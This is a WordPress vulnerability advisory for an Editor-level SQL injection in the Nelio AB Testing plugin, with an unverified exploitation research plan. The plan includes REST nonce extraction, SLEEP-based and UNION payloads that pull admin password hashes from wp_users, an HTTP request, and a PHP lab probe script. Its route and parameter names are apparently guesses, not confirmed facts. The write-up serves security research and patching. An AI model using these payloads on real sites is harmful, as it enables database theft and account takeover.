CVE-2026-25378

Nelio AB Testing <= 8.2.4 - Authenticated (Editor+) SQL Injection

Severity: Medium
Weakness: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CVSS Score: 4.9
Patched in: 8.2.5
Time to patch: 6d

Description

The Nelio AB Testing plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 8.2.4 due to insufficient escaping of a user-supplied parameter and a lack of sufficient preparation of the existing SQL query. This makes it possible for authenticated attackers, with Editor-level access and above, to append additional SQL to already existing queries and use it to extract sensitive information from the database.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: High
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: None
Availability: None

Technical Details

Affected versions: <= 8.2.4
Published: February 19, 2026
Last updated: February 24, 2026
Affected plugin: nelio-ab-testing

Source Code

WordPress.org SVN
Research Plan
Unverified

This research plan outlines the steps to identify and exploit CVE-2026-25378, an authenticated SQL injection vulnerability in the Nelio A/B Testing plugin.

1. Vulnerability Summary

CVE-2026-25378 is a SQL injection vulnerability in the Nelio A/B Testing plugin (versions <= 8.2.4). The flaw is inferred to reside in the handling of user-supplied parameters within database queries used for reporting or experiment management. The plugin fails to use $wpdb->prepare() or to escape the input adequately, allowing an authenticated user with Editor privileges or higher to append arbitrary SQL to the query. This can lead to the exfiltration of sensitive data, including administrator password hashes from the users table (wp_users with the default table prefix).

2. Attack Vector Analysis

  • Entry Point: Likely a REST API route registered under the nelio-ab-testing/v1 namespace or an AJAX action registered via wp_ajax_.
  • Vulnerable Parameter: Parameters related to filtering or sorting experiment data (e.g., id, experiment_id, orderby, or order).
  • Authentication: Editor-level account (or higher).
  • Preconditions: The plugin must be active, and at least one experiment may need to exist to trigger the relevant query logic.

3. Code Flow (Inferred)

  1. Registration: The plugin registers a REST route (e.g., in includes/class-nelio-ab-testing-api.php or includes/nelio-ab-testing-functions.php; inferred paths) with a permission_callback that checks a capability. Note that edit_posts is also granted to Authors and Contributors, so an Editor+ boundary implies a capability such as edit_others_posts or a plugin-specific check rather than edit_posts alone.
  2. Request Handling: A request is sent to an endpoint like /wp-json/nelio-ab-testing/v1/stats or /wp-json/nelio-ab-testing/v1/get-data.
  3. Data Processing: The handler function retrieves parameters from the WP_REST_Request object (e.g., $request->get_param( 'id' )).
  4. The Sink: The parameter is concatenated directly into a SQL string or passed to a helper function that builds a query without using $wpdb->prepare().
  5. Execution: $wpdb->get_results() is called with the malicious query string.
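
The sink described in steps 3 to 5 is the classic WordPress pattern of splicing request parameters into a $wpdb query string. The following is an added example, not code from the Nelio AB Testing plugin or from this advisory: a hypothetical REST handler written in that vulnerable style beside a hardened version of the same handler. The function names, the nab_results table and the parameter names are assumptions chosen to match the plan's inferred parameters (id, orderby, order).

```php
<?php
/**
 * Added example, not code from the Nelio AB Testing plugin or this advisory.
 * It models the inferred sink pattern (a REST handler that splices request
 * parameters into a $wpdb query) beside a hardened version of the same handler.
 * Function, table and parameter names are hypothetical.
 */

// Vulnerable pattern: the advisory's "lack of sufficient preparation".
function nab_example_vulnerable_stats( WP_REST_Request $request ) {
    global $wpdb;
    $id      = $request->get_param( 'id' );
    $orderby = $request->get_param( 'orderby' );

    // Both values land in the SQL text verbatim. With id = "1' OR 1=1-- -"
    // the quoted literal is closed and the rest of the WHERE clause rewritten;
    // orderby is an identifier, so quoting or esc_sql() would not help there.
    $sql = "SELECT * FROM {$wpdb->prefix}nab_results
            WHERE experiment_id = '$id' ORDER BY $orderby";

    return rest_ensure_response( $wpdb->get_results( $sql ) );
}

// Hardened: values are bound with prepare(), identifiers come from an allowlist.
function nab_example_hardened_stats( WP_REST_Request $request ) {
    global $wpdb;

    $id = absint( $request->get_param( 'id' ) );

    // prepare() cannot bind column names with %s/%d (the %i identifier
    // placeholder exists only from WordPress 6.2), so ORDER BY input is
    // mapped onto a fixed set of known columns instead of being trusted.
    $allowed = array( 'id', 'created_at', 'visits', 'conversions' );
    $orderby = $request->get_param( 'orderby' );
    if ( ! in_array( $orderby, $allowed, true ) ) {
        $orderby = 'id';
    }
    $order = ( 'DESC' === strtoupper( (string) $request->get_param( 'order' ) ) ) ? 'DESC' : 'ASC';

    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}nab_results
         WHERE experiment_id = %d ORDER BY {$orderby} {$order}",
        $id
    );

    return rest_ensure_response( $wpdb->get_results( $sql ) );
}

// Declaring the argument schema on the route rejects bad input before the
// handler runs; edit_others_posts is the lowest core capability that gives
// the Editor+ boundary the advisory describes (edit_posts would admit Authors
// and Contributors as well).
add_action( 'rest_api_init', function () {
    register_rest_route( 'nab-example/v1', '/stats', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'nab_example_hardened_stats',
        'permission_callback' => function () {
            return current_user_can( 'edit_others_posts' );
        },
        'args' => array(
            'id'      => array( 'type' => 'integer', 'required' => true ),
            'orderby' => array(
                'type'    => 'string',
                'enum'    => array( 'id', 'created_at', 'visits', 'conversions' ),
                'default' => 'id',
            ),
            'order'   => array( 'type' => 'string', 'enum' => array( 'asc', 'desc' ), 'default' => 'asc' ),
        ),
    ) );
} );
```

The split matters when reviewing the real code: a handler can call $wpdb->prepare() for the WHERE values and still be injectable through an ORDER BY or column-name fragment that prepare() cannot bind, so each of the plan's candidate parameters (id, experiment_id, orderby, order) has to be traced to the query text separately.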

4. Nonce Acquisition Strategy

The Nelio A/B Testing plugin uses the standard WordPress REST API for its dashboard. With cookie authentication, WordPress only treats a REST request as logged in when it also carries a valid nonce for the wp_rest action, sent in the X-WP-Nonce header (or a _wpnonce parameter); without it the request is processed as an anonymous user and the permission_callback fails.

  1. Preparation: Create an Editor user and log in with it; the plugin's admin pages load the scripts that carry the nonce.
  2. Navigation: Navigate to the Nelio A/B Testing dashboard page (/wp-admin/admin.php?page=nelio-ab-testing-main) while logged in as the Editor.
  3. Extraction: The REST nonce is typically localized in the wpApiSettings object. In the browser devtools console, evaluate:
      window.wpApiSettings?.nonce
  4. Alternatives: If the plugin localizes its own settings object, check (inferred name):
      window.nelioAbTestingSettings?.nonce
    Independently of any page scripts, a logged-in session can fetch a fresh nonce with GET /wp-admin/admin-ajax.php?action=rest-nonce, a core AJAX action that returns wp_create_nonce('wp_rest') for the current user. Nonces are valid for 12 to 24 hours, so regenerate them during long sessions.

5. Exploitation Strategy

Time-based blind injection is tried first because it works whether or not query results are reflected in the response; it is also the slowest way to extract data, so switch to union- or boolean-based techniques once the response behaviour is understood.

  • Endpoint: /wp-json/nelio-ab-testing/v1/stats (inferred; a common shape for reporting plugins, not confirmed by the advisory).
  • Method: GET or POST (depending on route registration; the namespace index at /wp-json/nelio-ab-testing/v1 lists the methods and declared args of each route).
  • Payload (time-based, numeric context):
    1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)
  • HTTP Request (example, string context; the logged-in session cookie must accompany the nonce, and the body is shown before the URL-encoding that a form body requires for the quote, spaces and parentheses):
    POST /wp-json/nelio-ab-testing/v1/stats
    Host: localhost:8080
    Cookie: [LOGGED-IN EDITOR SESSION COOKIES]
    X-WP-Nonce: [EXTRACTED_NONCE]
    Content-Type: application/x-www-form-urlencoded
    
    id=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -
    
  • Payload (union-based, if output is reflected; the column count must match the original SELECT, and wp_ is only the default table prefix):
    1' UNION SELECT 1,user_login,user_pass,4,5 FROM wp_users-- -

6. Test Data Setup

  1. Install Plugin: Install and activate Nelio A/B Testing version 8.2.4.
  2. Create User: Create a user with the editor role.
    • wp user create attacker attacker@example.com --role=editor --user_pass=password
  3. Initialize Plugin: Some plugins require a "setup" or a first experiment to populate tables.
    • Use wp post create --post_type=nab_experiment --post_title="Test Experiment" --post_status=publish (inferred post type).
  4. Identify Route: Request the namespace index, GET /wp-json/nelio-ab-testing/v1, which lists every route registered under the namespace together with its methods and declared args; or list them from WP-CLI with wp eval 'foreach ( array_keys( rest_get_server()->get_routes() ) as $r ) { if ( 0 === strpos( $r, "/nelio-ab-testing/" ) ) echo "$r\n"; }'.

7. Expected Results

  • Vulnerability Confirmation: A request carrying the SLEEP(5) payload should take at least about 5 seconds longer than the same request with a benign value; measure a baseline first and repeat a few times to rule out network jitter. SLEEP() only fires if MySQL actually evaluates the injected expression, so if the outer query matches no rows (for example, an empty results table) a real injection can show no delay; that is why the test data setup creates an experiment.
  • Data Exposure: Successful extraction of the user_pass hash of an administrator (user ID 1 is usually, but not always, the first administrator account).

8. Verification Steps

After the HTTP exploit, verify the database state and the payload's effect:

  1. Check SQL execution: Enable the MySQL General Query Log, or define SAVEQUERIES as true in wp-config.php and dump $wpdb->queries, to see the final rendered query and confirm that the payload arrived unescaped.
  2. Verify Admin Hash: Use WP-CLI to get the actual admin hash and compare it with the exfiltrated value.
    • wp user get 1 --field=user_pass

9. Alternative Approaches

  • Boolean-based Blind: If time-based is blocked or unstable, compare the response length/status between id=1 AND 1=1 and id=1 AND 1=2.
  • Error-based: Inject an expression that forces a MySQL error carrying data, such as extractvalue() or updatexml() with an invalid XPath built from a subquery, and check whether the plugin returns $wpdb->last_error (or WP_DEBUG output) in the response. A plain tautology such as OR 1=1 changes the row set rather than raising an error and belongs with the boolean-based checks.
  • AJAX Endpoint: If REST routes are not vulnerable, check admin-ajax.php for registered actions:
    • grep -r "wp_ajax_nelio" .
    • Test actions like nelio_get_stats or nelio_load_experiment.
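
Sections 4 to 9 describe one procedure: authenticate as the Editor, reach the route, send the timing payload and then confirm at the database that the payload arrived unescaped. The following is an added example, not code from the plugin or this advisory, that runs that procedure from inside the target install with wp eval-file. Dispatching through rest_do_request() as the Editor created in section 6 removes the cookie and nonce handling, and hooking the core query filter records the SQL WordPress actually sends, which gives an indicator that does not depend on SLEEP() being evaluated. The route /nelio-ab-testing/v1/stats, the parameter name id and the Editor login attacker are assumptions inherited from the plan, not facts established by the advisory.

```php
<?php
/**
 * Added example, not code from the plugin or this advisory: a lab-only check
 * run from WP-CLI inside the target install, e.g.
 *     wp eval-file nab-sqli-check.php
 * It dispatches the REST request internally with rest_do_request() as the
 * Editor from the test setup, so no cookie or X-WP-Nonce is needed, and it
 * records every SQL statement through the core 'query' filter.
 *
 * Assumptions (inferred, not confirmed by the advisory): the route
 * /nelio-ab-testing/v1/stats, the parameter name 'id', and the Editor login
 * 'attacker' created with `wp user create attacker ... --role=editor`.
 */

$route   = '/nelio-ab-testing/v1/stats'; // inferred
$param   = 'id';                          // inferred
$delay   = 3;
$payload = "1' AND (SELECT 1 FROM (SELECT(SLEEP({$delay})))a)-- -";

$editor = get_user_by( 'login', 'attacker' );
if ( ! $editor ) {
    WP_CLI::error( 'Editor "attacker" not found; create it first (see Test Data Setup).' );
}
wp_set_current_user( $editor->ID );

// Record each statement after $wpdb has rendered it, just before execution.
$captured = array();
add_filter( 'query', function ( $sql ) use ( &$captured ) {
    $captured[] = $sql;
    return $sql;
} );

/** Dispatch one request internally (as the current user) and time it. */
function nab_check_dispatch( $method, $route, $param, $value ) {
    $request = new WP_REST_Request( $method, $route );
    $request->set_param( $param, $value );
    $start    = microtime( true );
    $response = rest_do_request( $request );
    return array(
        'status'  => $response->get_status(),
        'elapsed' => microtime( true ) - $start,
    );
}

// Baseline with a benign value, then the probe; keep only the probe's SQL.
$base     = nab_check_dispatch( 'GET', $route, $param, '1' );
$captured = array();
$probe    = nab_check_dispatch( 'GET', $route, $param, $payload );

// If the payload appears verbatim it was neither escaped (esc_sql/prepare %s
// would yield 1\' AND ...) nor cast (prepare %d would yield 1): the
// unprepared sink is confirmed even when SLEEP() never fired.
$unescaped = array_values( array_filter( $captured, function ( $sql ) use ( $payload ) {
    return false !== strpos( $sql, $payload );
} ) );

WP_CLI::line( sprintf( 'baseline: HTTP %d in %.2fs', $base['status'], $base['elapsed'] ) );
WP_CLI::line( sprintf( 'probe:    HTTP %d in %.2fs', $probe['status'], $probe['elapsed'] ) );
foreach ( $unescaped as $sql ) {
    WP_CLI::line( 'payload reached the database unescaped: ' . $sql );
}

if ( $unescaped || ( $probe['elapsed'] - $base['elapsed'] ) >= $delay ) {
    WP_CLI::success( 'SQL injection indicator present' );
} else {
    WP_CLI::line( 'No indicator; a 404 status means the route differs, otherwise the parameter name probably does (list routes via the namespace index).' );
}
```

A baseline status of 404 or 401/403 tells you the route or the capability assumption is wrong before any payload is interpreted; only a 200 on the baseline makes the timing comparison meaningful. Because the hook captures the query text itself, the same script distinguishes "parameter reaches SQL unescaped" from "parameter is prepared but the route is slow", which a purely network-side timing test cannot.
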
Research Findings
Static analysis — not yet PoC-verified

Summary

The Nelio AB Testing plugin for WordPress is vulnerable to SQL Injection in versions up to 8.2.4 due to the direct inclusion of user-supplied parameters in database queries without sufficient preparation or escaping. Authenticated attackers with Editor-level access can exploit this to extract sensitive data, including administrator password hashes, from the site's database.

Exploit Outline

  1. Authenticate to the WordPress target as a user with Editor-level privileges or higher.
  2. Navigate to the Nelio A/B Testing dashboard and extract the WordPress REST API nonce from the wpApiSettings or nelioAbTestingSettings localized JavaScript objects.
  3. Identify a vulnerable REST API route registered by the plugin (likely under the nelio-ab-testing/v1 namespace), such as /wp-json/nelio-ab-testing/v1/stats.
  4. Send a POST or GET request to the identified endpoint containing a SQL injection payload in a parameter like id, experiment_id, or orderby.
  5. Use a time-based blind injection payload (e.g., 1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)) to confirm the vulnerability by observing response time delays.
  6. Proceed to exfiltrate administrative user hashes or other sensitive database contents using boolean-based or time-based blind SQLi techniques.
